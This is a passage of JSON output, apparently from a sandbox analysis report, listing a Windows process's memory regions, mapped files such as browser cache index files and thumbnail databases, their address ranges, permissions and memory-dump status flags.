35590143, "entry_point": 0, "filename": null, "id": "region_1155", "name": "private_0x00000000021f0000", "norm_filename": null, 
"region_type": "private_memory", "start_va": 35586048, "timestamp": "00:01:06.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35651584, "type": "region", "version": 1 }, "end_va": 35655679, "entry_point": 0, "filename": null, "id": "region_1156", "name": "private_0x0000000002200000", "norm_filename": null, "region_type": "private_memory", "start_va": 35651584, "timestamp": "00:01:06.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35717120, "type": "region", "version": 1 }, "end_va": 35721215, "entry_point": 0, "filename": null, "id": "region_1157", "name": "private_0x0000000002210000", "norm_filename": null, "region_type": "private_memory", "start_va": 35717120, "timestamp": "00:01:06.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 35782656, "type": "region", "version": 1 }, "end_va": 35848191, "entry_point": 0, "filename": null, "id": "region_1158", "name": "private_0x0000000002220000", "norm_filename": null, "region_type": "private_memory", "start_va": 35782656, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" 
], "ref_process_dump": null, "size": 8192, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 35921919, "entry_point": 0, "filename": null, "id": "region_1159", "name": "pagefile_0x0000000002240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35913728, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36032511, "entry_point": 35979264, "filename": "\\Windows\\System32\\en-US\\wininet.dll.mui", "id": "region_1160", "name": "wininet.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\wininet.dll.mui", "region_type": "memory_mapped_file", "start_va": 35979264, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 36077567, "entry_point": 36044800, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1161", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 36044800, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 36126719, "entry_point": 36110336, "filename": 
"\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\Cookies\\index.dat", "id": "region_1162", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 36110336, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 36175872, "type": "region", "version": 1 }, "end_va": 36241407, "entry_point": 36175872, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat", "id": "region_1163", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 36175872, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 36241408, "type": "region", "version": 1 }, "end_va": 36306943, "entry_point": 36241408, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\History\\History.IE5\\MSHist012017122020171221\\index.dat", "id": "region_1164", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\history\\history.ie5\\mshist012017122020171221\\index.dat", "region_type": "memory_mapped_file", "start_va": 36241408, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36306944, "type": "region", "version": 1 }, 
"end_va": 36311039, "entry_point": 0, "filename": null, "id": "region_1165", "name": "pagefile_0x00000000022a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36306944, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36896768, "type": "region", "version": 1 }, "end_va": 37945343, "entry_point": 36896768, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db", "id": "region_1166", "name": "thumbcache_32.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db", "region_type": "memory_mapped_file", "start_va": 36896768, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 37949439, "entry_point": 0, "filename": null, "id": "region_1167", "name": "pagefile_0x0000000002430000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37945344, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 38010880, "type": "region", "version": 1 }, "end_va": 38019071, "entry_point": 0, "filename": null, "id": "region_1168", "name": "pagefile_0x0000000002440000", "norm_filename": null, "region_type": 
"pagefile_backed_memory", "start_va": 38010880, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 38092799, "entry_point": 38076416, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1169", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 38076416, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 38141952, "type": "region", "version": 1 }, "end_va": 38150143, "entry_point": 0, "filename": null, "id": "region_1170", "name": "pagefile_0x0000000002460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38141952, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 38207488, "type": "region", "version": 1 }, "end_va": 38211583, "entry_point": 38207488, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{1FA14682-CABC-4310-BDEA-6ED0DE65ED67}.2.ver0x0000000000000001.db", "id": "region_1171", "name": "{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db", "region_type": "memory_mapped_file", 
"start_va": 38207488, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 38273024, "type": "region", "version": 1 }, "end_va": 38289407, "entry_point": 38273024, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1172", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 38273024, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38338560, "type": "region", "version": 1 }, "end_va": 38342655, "entry_point": 0, "filename": null, "id": "region_1173", "name": "private_0x0000000002490000", "norm_filename": null, "region_type": "private_memory", "start_va": 38338560, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38404096, "type": "region", "version": 1 }, "end_va": 38408191, "entry_point": 0, "filename": null, "id": "region_1174", "name": "private_0x00000000024a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38404096, "timestamp": "00:01:06.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", 
"permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38469632, "type": "region", "version": 1 }, "end_va": 38473727, "entry_point": 0, "filename": null, "id": "region_1175", "name": "private_0x00000000024b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38469632, "timestamp": "00:01:06.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38535168, "type": "region", "version": 1 }, "end_va": 38539263, "entry_point": 0, "filename": null, "id": "region_1176", "name": "private_0x00000000024c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38535168, "timestamp": "00:01:06.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 38862847, "entry_point": 0, "filename": null, "id": "region_1177", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:06.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38862848, "type": "region", "version": 1 }, "end_va": 38866943, "entry_point": 0, "filename": null, "id": "region_1178", "name": "private_0x0000000002510000", "norm_filename": null, "region_type": "private_memory", 
"start_va": 38862848, "timestamp": "00:01:06.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38928384, "type": "region", "version": 1 }, "end_va": 38932479, "entry_point": 0, "filename": null, "id": "region_1179", "name": "private_0x0000000002520000", "norm_filename": null, "region_type": "private_memory", "start_va": 38928384, "timestamp": "00:01:06.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38993920, "type": "region", "version": 1 }, "end_va": 38998015, "entry_point": 0, "filename": null, "id": "region_1180", "name": "private_0x0000000002530000", "norm_filename": null, "region_type": "private_memory", "start_va": 38993920, "timestamp": "00:01:06.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39059456, "type": "region", "version": 1 }, "end_va": 39321599, "entry_point": 0, "filename": null, "id": "region_1181", "name": "private_0x0000000002540000", "norm_filename": null, "region_type": "private_memory", "start_va": 39059456, "timestamp": "00:01:06.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 39321600, 
"type": "region", "version": 1 }, "end_va": 39739391, "entry_point": 39321600, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1182", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 39321600, "timestamp": "00:01:06.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39780352, "type": "region", "version": 1 }, "end_va": 40042495, "entry_point": 0, "filename": null, "id": "region_1183", "name": "private_0x00000000025f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39780352, "timestamp": "00:01:06.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 40042496, "type": "region", "version": 1 }, "end_va": 41091071, "entry_point": 0, "filename": null, "id": "region_1184", "name": "private_0x0000000002630000", "norm_filename": null, "region_type": "private_memory", "start_va": 40042496, "timestamp": "00:01:06.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 41091072, "type": "region", "version": 1 }, "end_va": 
41095167, "entry_point": 0, "filename": null, "id": "region_1185", "name": "private_0x0000000002730000", "norm_filename": null, "region_type": "private_memory", "start_va": 41091072, "timestamp": "00:01:06.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41418751, "entry_point": 0, "filename": null, "id": "region_1186", "name": "private_0x0000000002740000", "norm_filename": null, "region_type": "private_memory", "start_va": 41156608, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 51052543, "entry_point": 41418752, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_1187", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 41418752, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 51052544, "type": "region", "version": 1 }, "end_va": 51060735, "entry_point": 0, "filename": null, "id": "region_1188", "name": "pagefile_0x00000000030b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 51052544, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 51118080, "type": "region", "version": 1 }, "end_va": 51134463, "entry_point": 51118080, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1189", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 51118080, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 51183616, "type": "region", "version": 1 }, "end_va": 51187711, "entry_point": 0, "filename": null, "id": "region_1190", "name": "private_0x00000000030d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51183616, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 51249152, "type": "region", "version": 1 }, "end_va": 51253247, "entry_point": 51249152, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db", "id": "region_1191", "name": "thumbcache_1024.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db", "region_type": "memory_mapped_file", "start_va": 51249152, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not 
tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 51314688, "type": "region", "version": 1 }, "end_va": 51318783, "entry_point": 51314688, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db", "id": "region_1192", "name": "thumbcache_sr.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db", "region_type": "memory_mapped_file", "start_va": 51314688, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 51380224, "type": "region", "version": 1 }, "end_va": 51384319, "entry_point": 51380224, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{4CA276EC-52B8-4975-9DCF-73426EA8BE98}.2.ver0x0000000000000002.db", "id": "region_1193", "name": "{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 51380224, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 51445760, "type": "region", "version": 1 }, "end_va": 51462143, "entry_point": 51445760, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1194", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 51445760, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 51511296, "type": "region", "version": 1 }, "end_va": 51515391, "entry_point": 51511296, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{AAA8DCD7-A38D-4E8A-B14C-574F94213A00}.2.ver0x0000000000000001.db", "id": "region_1195", "name": "{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db", "region_type": "memory_mapped_file", "start_va": 51511296, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 51576832, "type": "region", "version": 1 }, "end_va": 51580927, "entry_point": 51576832, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db", "id": "region_1196", "name": "thumbcache_idx.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db", "region_type": "memory_mapped_file", "start_va": 51576832, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 51642368, "type": "region", "version": 1 }, "end_va": 51904511, "entry_point": 0, "filename": null, "id": "region_1197", "name": "private_0x0000000003140000", "norm_filename": null, "region_type": "private_memory", "start_va": 51642368, "timestamp": 
"00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 51904512, "type": "region", "version": 1 }, "end_va": 52166655, "entry_point": 0, "filename": null, "id": "region_1198", "name": "private_0x0000000003180000", "norm_filename": null, "region_type": "private_memory", "start_va": 51904512, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 52166656, "type": "region", "version": 1 }, "end_va": 52170751, "entry_point": 0, "filename": null, "id": "region_1199", "name": "pagefile_0x00000000031c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52166656, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 52232192, "type": "region", "version": 1 }, "end_va": 52236287, "entry_point": 52232192, "filename": "\\Windows\\System32\\en-US\\wdmaud.drv.mui", "id": "region_1200", "name": "wdmaud.drv.mui", "norm_filename": "c:\\windows\\system32\\en-us\\wdmaud.drv.mui", "region_type": "memory_mapped_file", "start_va": 52232192, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, 
"size": 8192, "start_va": 52297728, "type": "region", "version": 1 }, "end_va": 52305919, "entry_point": 0, "filename": null, "id": "region_1201", "name": "pagefile_0x00000000031e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52297728, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 52363264, "type": "region", "version": 1 }, "end_va": 52625407, "entry_point": 0, "filename": null, "id": "region_1202", "name": "private_0x00000000031f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 52363264, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 52625408, "type": "region", "version": 1 }, "end_va": 52629503, "entry_point": 52625408, "filename": "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui", "id": "region_1203", "name": "mmdevapi.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui", "region_type": "memory_mapped_file", "start_va": 52625408, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 52690944, "type": "region", "version": 1 }, "end_va": 52699135, "entry_point": 0, "filename": null, "id": "region_1204", "name": "private_0x0000000003240000", "norm_filename": null, "region_type": "private_memory", "start_va": 52690944, 
"timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 52756480, "type": "region", "version": 1 }, "end_va": 52764671, "entry_point": 0, "filename": null, "id": "region_1205", "name": "pagefile_0x0000000003250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52756480, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 52822016, "type": "region", "version": 1 }, "end_va": 52830207, "entry_point": 0, "filename": null, "id": "region_1206", "name": "pagefile_0x0000000003260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52822016, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 52887552, "type": "region", "version": 1 }, "end_va": 53149695, "entry_point": 0, "filename": null, "id": "region_1207", "name": "private_0x0000000003270000", "norm_filename": null, "region_type": "private_memory", "start_va": 52887552, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 208896, 
"start_va": 53149696, "type": "region", "version": 1 }, "end_va": 53358591, "entry_point": 0, "filename": null, "id": "region_1208", "name": "private_0x00000000032b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53149696, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 53411840, "type": "region", "version": 1 }, "end_va": 53673983, "entry_point": 0, "filename": null, "id": "region_1209", "name": "private_0x00000000032f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53411840, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 53673984, "type": "region", "version": 1 }, "end_va": 53682175, "entry_point": 0, "filename": null, "id": "region_1210", "name": "pagefile_0x0000000003330000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 53673984, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 53739520, "type": "region", "version": 1 }, "end_va": 53743615, "entry_point": 0, "filename": null, "id": "region_1211", "name": "private_0x0000000003340000", "norm_filename": null, "region_type": "private_memory", "start_va": 53739520, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { 
